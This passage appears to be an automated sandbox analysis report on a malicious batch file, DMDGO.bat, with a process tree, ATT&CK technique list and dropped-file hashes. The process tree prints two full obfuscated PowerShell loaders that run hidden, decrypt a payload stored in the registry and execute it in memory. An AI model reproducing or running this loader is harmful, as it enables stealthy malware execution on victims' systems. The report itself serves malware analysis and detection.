$CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:1432
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:1
  2⤵
  PID:4808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2208 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3504 /prefetch:8
  2⤵
  PID:5416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  PID:5768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:8
  2⤵
  PID:5760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:8
  2⤵
  PID:6028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:6068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\Downloads\DMDGO (1).bat

Filesize
10.3MB

MD5
97c570f4ad15c696211bbaf1767ee85e

SHA1
d4465bdfa4f3fa5487d27846fb1d2c37e30bea3f

SHA256
9c8bd68c7232a9b6bd8559eb93be5a7b181b05f41b7540773b46d7d82302df19

SHA512
a463d7f9427a9eb494cc1088a476584d25bb7b382bbd05c925e7d377618570020474f24bcad4248da9cb28ad8701a728891657352340e48694f753d9a4630cbc

Download Submit
C:\Users\Admin\Downloads\DMDGO (1).bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\Downloads\DMDGO (1).bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\Downloads\DMDGO.bat

Filesize
10.3MB

MD5
97c570f4ad15c696211bbaf1767ee85e

SHA1
d4465bdfa4f3fa5487d27846fb1d2c37e30bea3f

SHA256
9c8bd68c7232a9b6bd8559eb93be5a7b181b05f41b7540773b46d7d82302df19

SHA512
a463d7f9427a9eb494cc1088a476584d25bb7b382bbd05c925e7d377618570020474f24bcad4248da9cb28ad8701a728891657352340e48694f753d9a4630cbc

Download Submit
C:\Users\Admin\Downloads\DMDGO.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\Downloads\DMDGO.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\Downloads\DMDGO.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
